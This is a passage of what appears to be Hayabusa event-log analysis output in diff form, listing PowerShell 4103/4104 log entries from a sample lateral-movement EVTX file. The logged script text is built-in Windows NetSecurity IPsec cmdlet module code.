$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetNam",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"e )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"e )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.612 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.612 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.614 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.615 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.615 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.616 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.616 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.659 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 